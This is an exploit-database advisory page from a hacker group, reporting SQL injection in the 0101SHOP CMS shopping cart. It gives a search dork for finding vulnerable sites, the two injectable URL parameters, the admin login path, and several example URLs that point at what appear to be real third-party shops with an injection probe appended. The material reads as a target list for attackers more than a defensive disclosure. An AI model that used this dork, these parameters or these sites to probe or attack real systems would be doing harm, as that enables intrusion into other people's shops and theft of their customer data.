0101SHOP CMS SQL Injection

2013.02.18
Credit: IRaNHaCK
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89
Dork: intext:\"Powered by 0101HOST - Shopping Cart System.\" =

.:: In The Name Of God ::. #################################################### # 0101SHOP CMS SQL Injection Vulnerability # # Security Risk : High # # Discovered By IRaNHaCK Security Team (MR.XpR # # Our WebSite : IRaNHaCK.ORG # # Tested On : XP , 7 , BackTrack # # Date : 2013-02-16 # # Version : All # # Category : WebApp # #################################################### ================================================================ 1- Dork : intext:"Powered by 0101HOST - Shopping Cart System." = = 2- Vulnerability(s) : = = Target.Com/productdetails.asp?pcode=[SQL] = Target.Com/listproduct.asp?categorycode=[SQL] = = 3- Example : = http://llsclifestyle.com/listproduct.asp?categorycode=101%27 = http://shop.pmcguild.hk/productdetails.asp?pcode=31043-150%27 = http://shop.honghaico.hk/listproduct.asp?categorycode=1%27 = http://shop.hkdongjian.com/listproduct.asp?categorycode=102%27 = = 4- Admin Page : = Target.Com/adminlogin.asp = ================================================================ ********************************************************************************************** We Are : Mr.XpR - UnknowN - FarbodEzRaeL - Bl4ck.Viper - Siamak.Black - MojiRider - V30Sharp * Mr.FixXxer - mr.remot3rs - nazila - HACKER OF FLOOD & All Members Of IRaNHaCK.ORG * ********************************************************************************************** ./By MojiRider ./Persian Gulf For Ever


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top